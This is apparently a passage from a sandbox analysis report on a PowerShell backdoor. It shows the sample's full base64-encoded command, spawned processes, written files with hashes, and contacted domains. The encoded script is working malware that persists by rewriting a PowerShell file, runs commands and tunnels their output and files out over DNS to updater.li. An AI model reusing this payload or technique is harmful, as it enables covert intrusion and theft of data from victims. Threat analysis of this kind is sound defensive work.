QBtAC4ASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAG0AeQBGAGkAbABlAFAAYQB0AGgAKQA7AA0ACgAgACAAIAAgACQAaQA9ADAAOwANAAoAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACQAagA9ADAAOwANAAoAIAAgACAAIAB3AGgAaQBsAGUAKAAkAGkAIAAtAGwAZQAgACQAbQB5AHMAdAByAC4ATABlAG4AZwB0AGgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABtAHkAdABlAG0AcAAgACsAPQAgACQAbQB5AHMAdAByAFsAJABpAF0AOwANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAoACgAKAAkAGkAJQAyADQAKQAgAC0AZQBxACAAMgAzACkAIAAtAG8AcgAgACgAJABpACAALQBlAHEAIAAkAG0AeQBzAHQAcgAuAEwAZQBuAGcAdABoACkAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbQB5AGgAZQB4ACAAPQAgAFMAdAByADIASABlAHgAIAAkAG0AeQB0AGUAbQBwADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADIAIAAkAG0AeQBGAGkAbABlAE4AYQBtAGUAIAAoAGMAbwBuAHYAZQByAHQAVABvAC0AQgBhAHMAZQAzADYAIAAkAGoAKQApACAAKwAgACQAbQB5AGgAZQB4ACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABqACsAKwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG0AeQB0AGUAbQBwACAAPQAgACcAJwA7AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACQAaQArACsAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdABJAEQADQAKAHsADQAKAAkAJAB2AGEAbABpAGQAYwBoAGEAcgBzACAAPQAgACIAMAAxADIAMwA0ADUANgA3ADgAOQBBAEIAQwBEAEUARgBHAEgASQBKAEsATABNAE4ATwBQAFEAUgBTAFQAVQBWAFcAWABZAFoAYQBiAGMAZABlAGYAZwBoAGkAagBrAGwAbQBuAG8AcABxAHIAcwB0AHUAdgB3AHgAeQB6ACIAOwANAAoAIAAgACAAIAAkAHQAaQBkACAAPQAgAFMAZQBuAGQAUgBlAGMAZQBpAHYAZQBEAE4AUwAgACgAKABHAGUAdABTAHUAYgAgADAAKQArACcAMwAwACcAKQA7AA0ACgAJAGkAZgAgACgAJAB2AGEAbABpAGQAYwBoAGEAcgBzAC4AQwBvAG4AdABhAGkAbgBzACgAJAB0AGkAZAApACkAewAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAA9ACQAdABpAGQAOwB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABDAGgAYQBuAGcAZQBUAGgAaQBzAEYAaQBsAGUAIAAoACQAYgBvAHQAaQBkACkADQAKAHsADQAKAAkAaQBmACgALQBuAG8AdAAoACQAZwBsAG8AYgBhAGwAOgBtAHkAaQBkACAALQBlAHEAIAAoACcAIwAnACsAJwAjACMAJwApACkAKQANAAoAIAAgACAAIAB7AA0ACgAJAAkAJABmAGMAPQAoAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAZQBuAHYAOgBQAHUAYgBsAGkAYwBcAEwAaQBiAHIAYQByAGkAZQBzAFwAUgBlAGMAbwByAGQAZQBkAFQAVgBcAEQAbgBTADEALgBwAHMAMQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpACkAOwANAAoACQAJACQAZgBjAD0AJABmAGMALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQANwApAC4AVAByAGkAbQBFAG4AZAAoACcAIgAnACcAfQAiACcAKQA7AA0ACgAJAAkAJABmAGMAPQBbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAGMAKQApADsADQAKAAkACQAkAGYAYwA9ACQAZgBjACAALQByAGUAcABsAGEAYwBlACAAKAAnACMAJwArACcAIwAjACcAKQAsACQAYgBvAHQAaQBkADsADQAKAAkACQAkAGYAYwA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAGYAYwApACkAOwANAAoACQAJACQAZgBjAD0AJwBwAG8AdwBlAHIAcwBoAGUAbABsACAAIgAmAHsAaQBlAHgAIAAnACcAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAZABjAG8AbQBtAGEAbgBkACAAIgAnACsAJABmAGMAKwAnACIAJwAnAH0AIgAnADsADQAKAAkACQBTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAGUAbgB2ADoAUAB1AGIAbABpAGMAXABMAGkAYgByAGEAcgBpAGUAcwBcAFIAZQBjAG8AcgBkAGUAZABUAFYAXABEAG4AUwAxAC4AcABzADEAIAAkAGYAYwAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQQBzAGMAaQBpADsADQAKAAkAfQANAAoAfQANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAGkAdAANAAoAewANAAoAIAAgACAAIABpAGYAKAAkAGcAbABvAGIAYQBsADoAbQB5AGkAZAAgAC0AZQBxACAAKAAnACMAJwArACcAIwAjACcAKQApAA0ACgAgACAAIAAgAHsADQAKAAkACQBtAGQAIAAtAEYAbwByAGMAZQAgACgAJABnAGwAbwBiAGEAbAA6AG0AeQBoAG8AbQBlACsAJwB0AHAAXAAnACkAOwANAAoACQAJAEcAZQB0AEkARAA7AA0ACgAJAAkAQwBoAGEAbgBnAGUAVABoAGkAcwBGAGkAbABlACAAJABnAGwAbwBiAGEAbAA6AG0AeQBpAGQAOwANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgBmAHUAbgBjAHQAaQBvAG4AIABtAGEAaQBuAA0ACgB7AA0ACgAgACAAIAAgAEkAbgBpAHQAOwANAAoAIAAgACAAIABpAGYAKABBAGwAaQB2AGUAIAAtAGUAcQAgADEAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACAAPgAgACcAKwAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUwBlAG4AZABGAGkAbABlACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAGIAYQB0ACcAKQA7AA0ACgAgACAAIAAgACAAIAAgACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAKAAkAGcAbABvAGIAYQBsADoAbQB5AGgAbwBtAGUAKwAnAHQAcABcACcAKwAkAGcAbABvAGIAYQBsADoAZgBpAGwAZQBuAGEAbQBlACsAJwAuAHQAeAB0ACcAKQA7AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAG0AYQBpAG4AOwANAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DEKKD4JDJMZK07TK8CWO.temp | — | |
MD5:— | SHA256:— | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1QN5ZTAWO4RBE1ZB137V.temp | — | |
MD5:— | SHA256:— | |||
1920 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TR1MBQMBBMKZUQ19FVYN.temp | — | |
MD5:— | SHA256:— | |||
4012 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P248QSOIFVOPS5Z9DKGQ.temp | — | |
MD5:— | SHA256:— | |||
3816 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\02TB4F2WVWZAJ9H5ILNR.temp | — | |
MD5:— | SHA256:— | |||
3700 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QIZ9QXGKSNC72PM6I8G6.temp | — | |
MD5:— | SHA256:— | |||
2884 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RKEUBC20HNQ8ZWR3GKI5.temp | — | |
MD5:— | SHA256:— | |||
2896 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0XXIX92KIYN6ZCUUSS54.temp | — | |
MD5:— | SHA256:— | |||
3252 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA | |||
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0C1DAA668BA499584B0AC7476368101E | SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA |
Domain | IP | Reputation |
---|---|---|
zz000000RYF30.updater.li |
| unknown |
updater.li |
| unknown |